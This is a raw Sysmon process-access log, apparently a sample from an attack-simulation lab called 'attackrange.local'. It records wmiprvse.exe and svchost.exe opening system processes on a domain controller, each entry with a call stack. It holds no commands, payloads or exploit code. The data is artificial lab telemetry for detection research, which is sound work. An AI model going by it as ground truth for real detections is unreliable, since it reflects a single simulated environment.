16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6DAA-603E-B3AA-00000000AD01}10880C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAA-603E-B3AA-00000000AD01}10880C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:02.975{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 